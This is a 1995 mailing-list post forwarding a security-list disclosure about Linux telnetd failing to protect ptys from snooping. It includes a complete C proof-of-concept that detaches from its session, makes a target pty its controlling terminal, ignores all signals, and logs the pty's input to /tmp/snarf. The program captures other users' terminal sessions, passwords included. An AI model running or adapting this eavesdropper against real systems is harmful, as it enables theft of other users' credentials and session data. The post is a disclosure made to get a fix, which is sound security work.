Linux tty Surfing ... any1 had problems with it ?!
Got this in the mail.
Has anyone had any problems with it?
Any known fixes?
Forwarded message:
> Received: from suburbia.net (suburbia.apana.org.au [192.188.107.90]) by yarrina.connect.com.au with ESMTP id CAA26655
> (8.6.12/IDA-1.6); Wed, 27 Sep 1995 02:58:06 +1000
> Received: (majordom@localhost) by suburbia.net (8.6.12/Proff-950810) id XAA10939 for best-of-security-outgoing; Tue, 26 Sep 1995 23:08:07 +1000
> Received: (proff@localhost) by suburbia.net (8.6.12/Proff-950810) id XAA10930 for best-of-security; Tue, 26 Sep 1995 23:07:49 +1000
> Date: Tue, 26 Sep 1995 23:07:49 +1000
> From: Julian Assange <proff@suburbia.net>
> Message-Id: <199509261307.XAA10930@suburbia.net>
> To: best-of-security@suburbia.net
> Subject: BoS: linux tty surfing
> Sender: owner-best-of-security@suburbia.net
> Errors-to: nobody@connect.com.au
> Reply-To: nobody@connect.com.au
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
>
> Hi all,
>
> I've done some more testing on this, and got the following results
> with 1.2.10 (yeah, I'm not really on the bleeding edge):
>
> * telnetd as of NetKit-0.5 does not protect you from anyone
> snooping on your pty. I guess we know that by now.
> There's some code in sys_term.c that does a vhangup on the
> pty, but it's commented out for Linux. The comment says that
> this appears to be buggy.
>
> * Using login from util-linux-2.2 helps a bit. If you do a
> cat /dev/ttyp0, it will terminate once login is executed by
> telnetd. That's because login *does* do a vhangup.
>
> * Unfortunately, this is not the end of it. I experimented
> a little, and found that a program that ignores all signals
> *and* makes the pty its controlling tty will happily live on,
> and is still able to read data from it. I'm including it
> below.
>
> What I do not understand is why this does not make telnetd
> fail when doing an ioctl(TIOCSCTTY). Anyone more familiar with
> this stuff may be able to shed some light on this (Ted?).
>
> Olaf
> - --
> Olaf Kirch | --- o --- Nous sommes du soleil we love when we play
> okir@monad.swb.de | / | \ sol.dhoop.naytheet.ah kin.ir.samse.qurax
> For my PGP public key, finger okir@brewhq.swb.de.
> - ------------------------------------------------------------------
> /*
>  * simple test program for. Not my usual standard of coding...
>  */
> #include <stdio.h>
> #include <unistd.h>
> #include <signal.h>
> #include <termios.h>
> #include <sys/types.h>
> #include <sys/fcntl.h>
> #include <sys/ioctl.h>	/* declares ioctl() and TIOCSCTTY */
>
> int
> main(int argc, char **argv)
> {
> 	char	buffer[256];
> 	FILE	*fp;
> 	int	fd, i, n;
>
> 	/* drop every inherited descriptor, then start a new session */
> 	for (i = 0; i < 256; i++)
> 		close(i);
> 	setsid();
> 	if ((fd = open(argv[1], O_RDWR)) < 0) {
> 		perror("open");
> 		return 2;
> 	}
> 	/* make the pty named in argv[1] our controlling tty */
> 	if (ioctl(fd, TIOCSCTTY, NULL) < 0)
> 		perror("ioctl");
> 	if ((fp = fopen("/tmp/snarf", "w")) == NULL)
> 		return 2;
> 	/* ignore all signals, so the hangup from vhangup does not end us */
> 	for (i = 0; i < 32; i++)
> 		signal(i, SIG_IGN);
> 	/* log whatever can still be read from the pty */
> 	while ((n = read(fd, buffer, 255)) > 0) {
> 		buffer[n] = 0;
> 		fprintf(fp, "got %s\n", buffer);
> 	}
> 	perror("read");
> 	return 2;
> }
>
> --
>
>
> did I say, "dumb."
>
--
Oren Poleg, Work: (972)-3-5750570
System Administrator Home: (972)-9-919678
Euronet Communications http://www.euronet.co.il/~poleg
Public key available on finger